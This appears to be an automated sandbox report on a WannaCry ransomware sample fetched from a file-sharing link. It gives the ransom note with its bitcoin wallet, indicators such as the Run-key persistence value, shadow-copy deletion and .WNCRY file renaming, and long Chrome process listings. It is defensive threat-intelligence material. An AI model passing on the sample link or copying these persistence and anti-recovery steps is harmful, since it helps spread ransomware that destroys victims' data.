wannacry | hxxps://gofile[.]io/d/fPuoEW

Resubmissions

04/04/2023, 08:51

230404-kschgafg2y 10

04/04/2023, 08:38

230404-kjzxeadg78 10

03/04/2023, 18:12

230403-wtn4fagd53 10

03/04/2023, 18:08

230403-wrdjxsgd36 10

Analysis

max time kernel
82s
max time network
85s
platform
windows10-2004_x64
resource
win10v2004-20230221-en
resource tags

arch:x64arch:x86image:win10v2004-20230221-enlocale:en-usos:windows10-2004-x64system
submitted
03/04/2023, 18:12

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

https://gofile.io/d/fPuoEW

Score

10^/10

wannacry discovery persistence ransomware spyware stealer worm

Malware Config

Extracted

Path

C:\Users\Admin\Downloads\@[email protected]

Family

wannacry

Ransom Note

Q: What's wrong with my files? A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted. If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely! Let's start decrypting! Q: What do I do? A: First, you need to pay service fees for the decryption. Please send $300 worth of bitcoin to this bitcoin address: 12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw Next, please find an application file named "@[email protected]". It is the decrypt software. Run and follow the instructions! (You may need to disable your antivirus for a while.) Q: How can I trust? A: Don't worry about decryption. We will decrypt your files surely because nobody will trust us if we cheat users. * If you need our assistance, send a message by clicking <Contact Us> on the decryptor window. �

Wallets

12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw

Signatures

Wannacry
WannaCry is a ransomware cryptoworm.
ransomware worm wannacry
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490
Downloads MZ/PE file

Modifies extensions of user files 6 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

description	ioc	Process
File opened for modification	C:\Users\Admin\Pictures\OutAdd.tiff.WNCRY	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
File created	C:\Users\Admin\Pictures\SkipFind.tiff.WNCRYT	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
File renamed	C:\Users\Admin\Pictures\SkipFind.tiff.WNCRYT => C:\Users\Admin\Pictures\SkipFind.tiff.WNCRY	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
File opened for modification	C:\Users\Admin\Pictures\SkipFind.tiff.WNCRY	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
File created	C:\Users\Admin\Pictures\OutAdd.tiff.WNCRYT	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
File renamed	C:\Users\Admin\Pictures\OutAdd.tiff.WNCRYT => C:\Users\Admin\Pictures\OutAdd.tiff.WNCRY	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe

Drops startup file 2 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\~SD540F.tmp	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\~SD5436.tmp	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe

Executes dropped EXE 8 IoCs

pid	Process
5460	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
2792	taskdl.exe
5936	@[email protected]
5248	@[email protected]
5336	taskhsvc.exe
5528	taskdl.exe
6204	taskse.exe
6188	@[email protected]

Loads dropped DLL 7 IoCs

pid	Process
5336	taskhsvc.exe
5336	taskhsvc.exe
5336	taskhsvc.exe
5336	taskhsvc.exe
5336	taskhsvc.exe
5336	taskhsvc.exe
5336	taskhsvc.exe

Modifies file permissions 1 TTPs 1 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
7116	icacls.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\urfnhjtdlojhzxx574 = "\"C:\\Users\\Admin\\Downloads\\tasksche.exe\""	reg.exe

Looks up external IP address via web service 3 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
647	whatismyipaddress.com
645	whatismyipaddress.com
646	whatismyipaddress.com

Sets desktop wallpaper using registry 2 TTPs 2 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@[email protected]"	@[email protected]
Set value (str)	\REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@[email protected]"	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133250264089345755"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
6072	reg.exe

Suspicious behavior: EnumeratesProcesses 8 IoCs

pid	Process
748	chrome.exe
748	chrome.exe
5336	taskhsvc.exe
5336	taskhsvc.exe
5336	taskhsvc.exe
5336	taskhsvc.exe
5336	taskhsvc.exe
5336	taskhsvc.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 57 IoCs

pid	Process
748	chrome.exe
748	chrome.exe
748	chrome.exe
748	chrome.exe
748	chrome.exe
748	chrome.exe
748	chrome.exe
748	chrome.exe
748	chrome.exe
748	chrome.exe
748	chrome.exe
748	chrome.exe
748	chrome.exe
748	chrome.exe
748	chrome.exe
748	chrome.exe
748	chrome.exe
748	chrome.exe
748	chrome.exe
748	chrome.exe
748	chrome.exe
748	chrome.exe
748	chrome.exe
748	chrome.exe
748	chrome.exe
748	chrome.exe
748	chrome.exe
748	chrome.exe
748	chrome.exe
748	chrome.exe
748	chrome.exe
748	chrome.exe
748	chrome.exe
748	chrome.exe
748	chrome.exe
748	chrome.exe
748	chrome.exe
748	chrome.exe
748	chrome.exe
748	chrome.exe
748	chrome.exe
748	chrome.exe
748	chrome.exe
748	chrome.exe
748	chrome.exe
748	chrome.exe
748	chrome.exe
748	chrome.exe
748	chrome.exe
748	chrome.exe
748	chrome.exe
748	chrome.exe
748	chrome.exe
748	chrome.exe
748	chrome.exe
748	chrome.exe
748	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	748	chrome.exe
Token: SeCreatePagefilePrivilege	748	chrome.exe
Token: SeShutdownPrivilege	748	chrome.exe
Token: SeCreatePagefilePrivilege	748	chrome.exe
Token: SeShutdownPrivilege	748	chrome.exe
Token: SeCreatePagefilePrivilege	748	chrome.exe
Token: SeShutdownPrivilege	748	chrome.exe
Token: SeCreatePagefilePrivilege	748	chrome.exe
Token: SeShutdownPrivilege	748	chrome.exe
Token: SeCreatePagefilePrivilege	748	chrome.exe
Token: SeShutdownPrivilege	748	chrome.exe
Token: SeCreatePagefilePrivilege	748	chrome.exe
Token: SeShutdownPrivilege	748	chrome.exe
Token: SeCreatePagefilePrivilege	748	chrome.exe
Token: SeShutdownPrivilege	748	chrome.exe
Token: SeCreatePagefilePrivilege	748	chrome.exe
Token: SeShutdownPrivilege	748	chrome.exe
Token: SeCreatePagefilePrivilege	748	chrome.exe
Token: SeShutdownPrivilege	748	chrome.exe
Token: SeCreatePagefilePrivilege	748	chrome.exe
Token: SeShutdownPrivilege	748	chrome.exe
Token: SeCreatePagefilePrivilege	748	chrome.exe
Token: SeShutdownPrivilege	748	chrome.exe
Token: SeCreatePagefilePrivilege	748	chrome.exe
Token: SeShutdownPrivilege	748	chrome.exe
Token: SeCreatePagefilePrivilege	748	chrome.exe
Token: SeShutdownPrivilege	748	chrome.exe
Token: SeCreatePagefilePrivilege	748	chrome.exe
Token: SeShutdownPrivilege	748	chrome.exe
Token: SeCreatePagefilePrivilege	748	chrome.exe
Token: SeShutdownPrivilege	748	chrome.exe
Token: SeCreatePagefilePrivilege	748	chrome.exe
Token: SeShutdownPrivilege	748	chrome.exe
Token: SeCreatePagefilePrivilege	748	chrome.exe
Token: SeShutdownPrivilege	748	chrome.exe
Token: SeCreatePagefilePrivilege	748	chrome.exe
Token: SeShutdownPrivilege	748	chrome.exe
Token: SeCreatePagefilePrivilege	748	chrome.exe
Token: SeShutdownPrivilege	748	chrome.exe
Token: SeCreatePagefilePrivilege	748	chrome.exe
Token: SeShutdownPrivilege	748	chrome.exe
Token: SeCreatePagefilePrivilege	748	chrome.exe
Token: SeShutdownPrivilege	748	chrome.exe
Token: SeCreatePagefilePrivilege	748	chrome.exe
Token: SeShutdownPrivilege	748	chrome.exe
Token: SeCreatePagefilePrivilege	748	chrome.exe
Token: SeShutdownPrivilege	748	chrome.exe
Token: SeCreatePagefilePrivilege	748	chrome.exe
Token: SeShutdownPrivilege	748	chrome.exe
Token: SeCreatePagefilePrivilege	748	chrome.exe
Token: SeShutdownPrivilege	748	chrome.exe
Token: SeCreatePagefilePrivilege	748	chrome.exe
Token: SeShutdownPrivilege	748	chrome.exe
Token: SeCreatePagefilePrivilege	748	chrome.exe
Token: SeShutdownPrivilege	748	chrome.exe
Token: SeCreatePagefilePrivilege	748	chrome.exe
Token: SeShutdownPrivilege	748	chrome.exe
Token: SeCreatePagefilePrivilege	748	chrome.exe
Token: SeShutdownPrivilege	748	chrome.exe
Token: SeCreatePagefilePrivilege	748	chrome.exe
Token: SeShutdownPrivilege	748	chrome.exe
Token: SeCreatePagefilePrivilege	748	chrome.exe
Token: SeShutdownPrivilege	748	chrome.exe
Token: SeCreatePagefilePrivilege	748	chrome.exe

Suspicious use of FindShellTrayWindow 34 IoCs

pid	Process
748	chrome.exe
748	chrome.exe
748	chrome.exe
748	chrome.exe
748	chrome.exe
748	chrome.exe
748	chrome.exe
748	chrome.exe
748	chrome.exe
748	chrome.exe
748	chrome.exe
748	chrome.exe
748	chrome.exe
748	chrome.exe
748	chrome.exe
748	chrome.exe
748	chrome.exe
748	chrome.exe
748	chrome.exe
748	chrome.exe
748	chrome.exe
748	chrome.exe
748	chrome.exe
748	chrome.exe
748	chrome.exe
748	chrome.exe
748	chrome.exe
748	chrome.exe
748	chrome.exe
748	chrome.exe
748	chrome.exe
748	chrome.exe
748	chrome.exe
748	chrome.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
748	chrome.exe
748	chrome.exe
748	chrome.exe
748	chrome.exe
748	chrome.exe
748	chrome.exe
748	chrome.exe
748	chrome.exe
748	chrome.exe
748	chrome.exe
748	chrome.exe
748	chrome.exe
748	chrome.exe
748	chrome.exe
748	chrome.exe
748	chrome.exe
748	chrome.exe
748	chrome.exe
748	chrome.exe
748	chrome.exe
748	chrome.exe
748	chrome.exe
748	chrome.exe
748	chrome.exe

Suspicious use of SetWindowsHookEx 6 IoCs

pid	Process
5936	@[email protected]
5248	@[email protected]
5248	@[email protected]
5936	@[email protected]
6188	@[email protected]
6188	@[email protected]

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 748 wrote to memory of 4220	748	chrome.exe	86
PID 748 wrote to memory of 4220	748	chrome.exe	86
PID 748 wrote to memory of 5004	748	chrome.exe	87
PID 748 wrote to memory of 5004	748	chrome.exe	87
PID 748 wrote to memory of 5004	748	chrome.exe	87
PID 748 wrote to memory of 5004	748	chrome.exe	87
PID 748 wrote to memory of 5004	748	chrome.exe	87
PID 748 wrote to memory of 5004	748	chrome.exe	87
PID 748 wrote to memory of 5004	748	chrome.exe	87
PID 748 wrote to memory of 5004	748	chrome.exe	87
PID 748 wrote to memory of 5004	748	chrome.exe	87
PID 748 wrote to memory of 5004	748	chrome.exe	87
PID 748 wrote to memory of 5004	748	chrome.exe	87
PID 748 wrote to memory of 5004	748	chrome.exe	87
PID 748 wrote to memory of 5004	748	chrome.exe	87
PID 748 wrote to memory of 5004	748	chrome.exe	87
PID 748 wrote to memory of 5004	748	chrome.exe	87
PID 748 wrote to memory of 5004	748	chrome.exe	87
PID 748 wrote to memory of 5004	748	chrome.exe	87
PID 748 wrote to memory of 5004	748	chrome.exe	87
PID 748 wrote to memory of 5004	748	chrome.exe	87
PID 748 wrote to memory of 5004	748	chrome.exe	87
PID 748 wrote to memory of 5004	748	chrome.exe	87
PID 748 wrote to memory of 5004	748	chrome.exe	87
PID 748 wrote to memory of 5004	748	chrome.exe	87
PID 748 wrote to memory of 5004	748	chrome.exe	87
PID 748 wrote to memory of 5004	748	chrome.exe	87
PID 748 wrote to memory of 5004	748	chrome.exe	87
PID 748 wrote to memory of 5004	748	chrome.exe	87
PID 748 wrote to memory of 5004	748	chrome.exe	87
PID 748 wrote to memory of 5004	748	chrome.exe	87
PID 748 wrote to memory of 5004	748	chrome.exe	87
PID 748 wrote to memory of 5004	748	chrome.exe	87
PID 748 wrote to memory of 5004	748	chrome.exe	87
PID 748 wrote to memory of 5004	748	chrome.exe	87
PID 748 wrote to memory of 5004	748	chrome.exe	87
PID 748 wrote to memory of 5004	748	chrome.exe	87
PID 748 wrote to memory of 5004	748	chrome.exe	87
PID 748 wrote to memory of 5004	748	chrome.exe	87
PID 748 wrote to memory of 5004	748	chrome.exe	87
PID 748 wrote to memory of 2628	748	chrome.exe	88
PID 748 wrote to memory of 2628	748	chrome.exe	88
PID 748 wrote to memory of 1908	748	chrome.exe	89
PID 748 wrote to memory of 1908	748	chrome.exe	89
PID 748 wrote to memory of 1908	748	chrome.exe	89
PID 748 wrote to memory of 1908	748	chrome.exe	89
PID 748 wrote to memory of 1908	748	chrome.exe	89
PID 748 wrote to memory of 1908	748	chrome.exe	89
PID 748 wrote to memory of 1908	748	chrome.exe	89
PID 748 wrote to memory of 1908	748	chrome.exe	89
PID 748 wrote to memory of 1908	748	chrome.exe	89
PID 748 wrote to memory of 1908	748	chrome.exe	89
PID 748 wrote to memory of 1908	748	chrome.exe	89
PID 748 wrote to memory of 1908	748	chrome.exe	89
PID 748 wrote to memory of 1908	748	chrome.exe	89
PID 748 wrote to memory of 1908	748	chrome.exe	89
PID 748 wrote to memory of 1908	748	chrome.exe	89
PID 748 wrote to memory of 1908	748	chrome.exe	89
PID 748 wrote to memory of 1908	748	chrome.exe	89
PID 748 wrote to memory of 1908	748	chrome.exe	89
PID 748 wrote to memory of 1908	748	chrome.exe	89
PID 748 wrote to memory of 1908	748	chrome.exe	89
PID 748 wrote to memory of 1908	748	chrome.exe	89
PID 748 wrote to memory of 1908	748	chrome.exe	89

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1158

pid	Process
7036	attrib.exe

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" "--simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT'" https://gofile.io/d/fPuoEW
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:748
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xe4,0x100,0x104,0xb4,0x108,0x7ff971169758,0x7ff971169768,0x7ff971169778
  2⤵
  PID:4220
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1820 --field-trial-handle=1836,i,9874500483434185606,4164092001124600578,131072 /prefetch:2
  2⤵
  PID:5004
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2168 --field-trial-handle=1836,i,9874500483434185606,4164092001124600578,131072 /prefetch:8
  2⤵
  PID:2628
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2164 --field-trial-handle=1836,i,9874500483434185606,4164092001124600578,131072 /prefetch:8
  2⤵
  PID:1908
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3156 --field-trial-handle=1836,i,9874500483434185606,4164092001124600578,131072 /prefetch:1
  2⤵
  PID:4628
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3284 --field-trial-handle=1836,i,9874500483434185606,4164092001124600578,131072 /prefetch:1
  2⤵
  PID:4608
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4536 --field-trial-handle=1836,i,9874500483434185606,4164092001124600578,131072 /prefetch:1
  2⤵
  PID:1952
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=4944 --field-trial-handle=1836,i,9874500483434185606,4164092001124600578,131072 /prefetch:1
  2⤵
  PID:3016
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4948 --field-trial-handle=1836,i,9874500483434185606,4164092001124600578,131072 /prefetch:8
  2⤵
  PID:3320
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5428 --field-trial-handle=1836,i,9874500483434185606,4164092001124600578,131072 /prefetch:8
  2⤵
  PID:1872
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=5304 --field-trial-handle=1836,i,9874500483434185606,4164092001124600578,131072 /prefetch:1
  2⤵
  PID:2480
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=5212 --field-trial-handle=1836,i,9874500483434185606,4164092001124600578,131072 /prefetch:1
  2⤵
  PID:2560
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5752 --field-trial-handle=1836,i,9874500483434185606,4164092001124600578,131072 /prefetch:8
  2⤵
  PID:2848
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=5748 --field-trial-handle=1836,i,9874500483434185606,4164092001124600578,131072 /prefetch:1
  2⤵
  PID:1360
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=6012 --field-trial-handle=1836,i,9874500483434185606,4164092001124600578,131072 /prefetch:1
  2⤵
  PID:1756
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=16 --mojo-platform-channel-handle=5664 --field-trial-handle=1836,i,9874500483434185606,4164092001124600578,131072 /prefetch:1
  2⤵
  PID:4940
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=17 --mojo-platform-channel-handle=6152 --field-trial-handle=1836,i,9874500483434185606,4164092001124600578,131072 /prefetch:1
  2⤵
  PID:5036
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=18 --mojo-platform-channel-handle=6304 --field-trial-handle=1836,i,9874500483434185606,4164092001124600578,131072 /prefetch:1
  2⤵
  PID:3796
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=20 --mojo-platform-channel-handle=6572 --field-trial-handle=1836,i,9874500483434185606,4164092001124600578,131072 /prefetch:1
  2⤵
  PID:5060
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=23 --mojo-platform-channel-handle=6936 --field-trial-handle=1836,i,9874500483434185606,4164092001124600578,131072 /prefetch:1
  2⤵
  PID:3648
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=22 --mojo-platform-channel-handle=6928 --field-trial-handle=1836,i,9874500483434185606,4164092001124600578,131072 /prefetch:1
  2⤵
  PID:4608
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=21 --mojo-platform-channel-handle=6668 --field-trial-handle=1836,i,9874500483434185606,4164092001124600578,131072 /prefetch:1
  2⤵
  PID:8
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=19 --mojo-platform-channel-handle=6496 --field-trial-handle=1836,i,9874500483434185606,4164092001124600578,131072 /prefetch:1
  2⤵
  PID:3424
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=24 --mojo-platform-channel-handle=5832 --field-trial-handle=1836,i,9874500483434185606,4164092001124600578,131072 /prefetch:1
  2⤵
  PID:5464
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=25 --mojo-platform-channel-handle=7268 --field-trial-handle=1836,i,9874500483434185606,4164092001124600578,131072 /prefetch:1
  2⤵
  PID:5528
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=26 --mojo-platform-channel-handle=7676 --field-trial-handle=1836,i,9874500483434185606,4164092001124600578,131072 /prefetch:1
  2⤵
  PID:5916
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=27 --mojo-platform-channel-handle=7588 --field-trial-handle=1836,i,9874500483434185606,4164092001124600578,131072 /prefetch:1
  2⤵
  PID:5976
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=28 --mojo-platform-channel-handle=7932 --field-trial-handle=1836,i,9874500483434185606,4164092001124600578,131072 /prefetch:1
  2⤵
  PID:6044
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=29 --mojo-platform-channel-handle=7960 --field-trial-handle=1836,i,9874500483434185606,4164092001124600578,131072 /prefetch:1
  2⤵
  PID:6112
- C:\Program Files\Google\Chrome\Application\chrome.exe
